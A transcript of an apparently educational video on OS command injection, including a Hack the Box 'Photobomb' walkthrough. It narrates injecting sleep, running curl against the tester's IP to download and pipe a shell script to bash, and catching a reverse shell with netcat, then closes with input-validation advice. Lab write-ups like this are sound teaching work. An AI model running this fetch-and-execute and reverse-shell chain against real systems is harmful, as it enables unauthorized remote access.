All right, let's talk about operating system command injection. This is another episode of our applied review. This one is going to be super short. I know the first couple of them were long. The next few are going to be shorter, and then they might get long form. It just depends on how much information we have to go over. And this one's pretty short, and that's because it's not that complicated. So without any further ado, let's talk about what command OS or OS command injection is. It's basically just vulnerabilities that allow attackers to execute system commands that are on the underlying system that the web application or whatever vulnerable application is running on. Oftentimes, attackers are able to actually leverage this kind of vulnerability to compromise, other parts of either the hosting infrastructure or, enumerate things in the adjacent file system, and etc. So it's definitely not, something to look over. It's actually a really big deal, but the prevention for this isn't super complicated, and it kind of makes sense how it's not that complicated, and um, you know, but still worth learning about. So let's just jump into how you might actually go about doing this. So imagine, right, there's a website where you need to check the whether or not a product is in stock at a given location. So if the website is gathering that information by some legacy or from some legacy databases, right, there might be an operating system program or just some custom program that takes the arguments and runs it and then returns a true or false. So if we're checking if product ID number 23 is present at location 6, we might run it through this Perl script, and you know, it would just take the arguments 23 and 6, and it would return, yes, it is in stock or no, it isn't. However, right, we know that this is being passed into the command line, or by just seeing this, we might think as an attacker, right, well, maybe this is being passed into the command line. Let's just try some command injection payloads. So you might try and to also execute the echo command and to copy hacker test out to the command line, and then and to continue the sequence. So that payload might look something like this, and you'll get an error message, but you should see this hacker test thing there if there's no protections in place. This is a pretty straightforward result to such an extent, like I didn't even feel the need to put up the sample output because it's pretty straightforward what this might do. Um, but at the same time, this is going to be a lot less common than blind OS command injection. I feel like most of the time you'll see it, at least in my experience, doing CTFs and doing bug bounty type stuff, right? This is all I've really seen out in the wild. I've never really seen a lot of verbose error messages that give me a lot of details. So if we aren't able to actually see the output of those errors, what else are we going to be able to do? Well, like we've done in previous kind of blind command injection or blind injection type attacks, you just have to be a little bit more observant of those indicators. So if there is a certain error message that it's giving you that's different than one you can produce with a reasonable input, that might be an indicator. If you're able to run like the ping, if you're able to inject the ping command, you could have it ping localhost and set a delay for 10 seconds, so that if your response time is larger, you know that your payload worked. You might even be able to use out-of-band techniques where you could send a DNS lookup to your HTTP server that you're running, or you might even be able to just send a GET request to your own HTTP server. And if you get a response, then you'll know, okay, my injection payload worked. There's really no better way to represent this than just showing you in a lab. So let's just go ahead and do that. We'll hop into Hack the Box Photobomb. It's just an easy Linux machine. It's got a couple steps. It's real short and sweet. So we'll jump into that, and then we'll come back here for prevention. All right, so we're here in the Photobomb machine on Hack the Box, and we can go ahead and get started with testing. The first thing that you'll do is you'll have to add photobomb.htb to your hosts file, and once you've done that, you can look at Photobomb here in your browser, because the IP address will resolve to photobomb.htb. The next thing we'll do is try to look for an endpoint that we can exploit. You'll notice when you try to go to a printer, it'll ask for some kind of credentials using, I think this is just basic HTTP authentication. And obviously we need to authenticate to it. But in this case, this machine's kind of not boring, but just it's an easy machine. So if you look at the page source here, maybe you can't see it too well, but you'll notice there's obviously just the HTML that's on the site, but then you also see some this JavaScript file that's being used. And if we zoom in a little bit, you can see that there's a set of credentials here that are used to access the printer endpoint. So I'm just going to copy the password bomb to my clipboard, and then photo like this is going to be our username. So let's go back here. Whoops, is it not going to remember? There we go. photo whoops, that's not what I meant to do. And you can see just like that, it lets us through to this printer page. And all this does, right, it looks like it lets us download these different prints here. We're going to download, I think we'll do this one, and we'll just say 600 by 400, or we'll do, yeah, that one's fine. I'm going to turn on my burp proxy and make sure that intercept is turned on in Burp Suite. I'm going to press download, and you'll see that it captures this. It's kind of weird that it's a post request when it's downloading this, but I guess it makes sense because we're specifying the photo name, the file type, and the dimensions. So we can just go ahead and throw this in the repeater and start playing around with it. You can see the default request will obviously download. This is the the JPEG data, which is fine. But that's all okay. This is what we're expecting. We can try and do some command injection here. So we could do different payloads. We could try and I don't think is going to work just because it's already using that here, but that doesn't necessarily mean that's going to be the case. We try a single tick here. Let's try who am I? Okay, and you can see that source photo doesn't exist, so it must be reading through that fairly correct, at least to an extent where it's giving us an error message that makes sense. Who am I? Or actually, we'll try semicolon, and then we'll try the single tick. This isn't a single quote. This is the key right below your escape key if you have a standard QWERTY keyboard. It's kind of hard to see on the monitor, so I figured I'd include that. Okay, so it looks like it's sanitizing both those fine. Let's go ahead and try with file name. We'll do who am I? Okay, interesting enough, right? We get a response, in this case, what looks like, oh, I thought that was a username, but it's just returning, oh, wait a minute, I'm completely trolling. It looks like it got the content disposition like that came in okay, but it couldn't generate a copy of the specified file name because it didn't have the correct extension. So that doesn't seem like it works. Let's try semicolon and then who am I? Okay, same thing. It's kind of passing it through. In this case, let's just try and see. Maybe we're not going to see the output of our commands in here. Maybe it's not going to be like the like some other instances where we actually see the result. Maybe it's blind OS command injection. So we can try. Let's do sleep. I think if we do a space, we'll do 5. If we do a space, oh, it looks like it still works, so it must be either encoding this in the response or it just doesn't care. But you'll notice, right, it's taken a good couple seconds to reply, and you can see that down here with the response time. So with that in mind, we've now verified that there is OS command injection present on here. And now we can go ahead and proceed to the next step, which you don't have to do this, but it's just good practice if you're going to be doing CTFs or anything like that. But we're going to go ahead and make a reverse shell and have it try and call out to us. So first, I'm going to see if we can use the curl command to call our IP address. So I'm going to do curl 10.10.14.187, which is my IP address in this Hack the Box VPN. You can see it at the top right, or if you go on Hack the Box's page, I think you can see it there as well. But we'll just try to curl our own IP address, and then back here in my terminal, I'm just going to do Python 3-m for module HTTP server, and we're just going to host it on port 80 and see what happens if I press send. You can see it does send a GET request to us, so it looks like we're able to call out to our own machine. And here's the IP address of Photobomb in my instance. So let's go ahead and cancel this and make a reverse shell. So I'm just going to do nano shell.sh, and we're going to do bin bash. And then on this second line here, we're just going to include this. This is from revshells.com. It's just a website that can help you make reverse shells. Even shows you how to make the listener. Really straightforward. Just throw in your IP address, whatever port you want to listen on, and then the it'll based on whatever you select here in the operating system, it'll make this command for you. So I'm just going to go ahead and copy this to my clipboard and paste it in here. Save it. And you'll see, there's the contents of it. Now I'm going to split my terminal, what's the word? Vertically? No, horizontally? I'm not sure the correct syntax. Let me make this just big enough for you to see it. And on this end, right, you can still see that shell sh is here. We're just going to do Python 3 and host that web server like we did before. And then in this terminal, we're going to do netcat listening verbose on port 1337, the one we specified in our command. Oh, forgot the dash here. All right. Well, now that looks kind of dirty. Let me fix it. There. Now that we've done that, we can just, not here, go back to Burp Suite. And in addition to calling out to our IP address, we're just going to say shell.sh. I think this syntax is right. And I think that's or and bash. So it should download shell.sh and then run bash on that script. And it looks like it worked. You can see that it got shell.sh and returned to status 200, and then it sent a shell to our listener. If I do who am I, it returns the user wizard. So there's a brief little demo of not only OS command injection, but how to actually turn that into a little bit more access on a web server. So I think that's all we got to do for quizzes. This is a pretty short topic to go over. So let's just hop back in with prevention strategies. Okay, and now that we've finished going through Photobomb, we can talk about prevention. So ideally, right, you don't have any user inputs that are required to actually use the application. Ideally, all your inputs are, not able to be controlled by a user, but let's say you absolutely need them and there's no way to work around. You're going to have to get ready to do some cleaning. And by cleaning, I just mean input validation. So you're going to want to validate all your user data against or all your user inputs against a whitelist of just verified things that you should be expecting so that you don't have to worry about it. You might also want to validate the data type in the very first example from the very beginning, where the inputs should have just been integers and not strings, but it let us put in a string with even some different characters. So that would be a good example of where you could narrow that stuff down. And then, validating the types of characters that are actually allowed to be used. So if you're not expecting, a tilde or a semicolon like we just saw, or maybe we did a semicolon, I haven't recorded that part yet, but you don't need all those characters in your user input. So, go ahead and just scrub all those things out. But, like I said, real short, sweet video today. Not a whole lot of detail into this. Obviously, it gets more detailed. You can go do some independent research as you find these things out in the wild. But for today's purposes, that's all we're going to go through. So thanks for tuning in.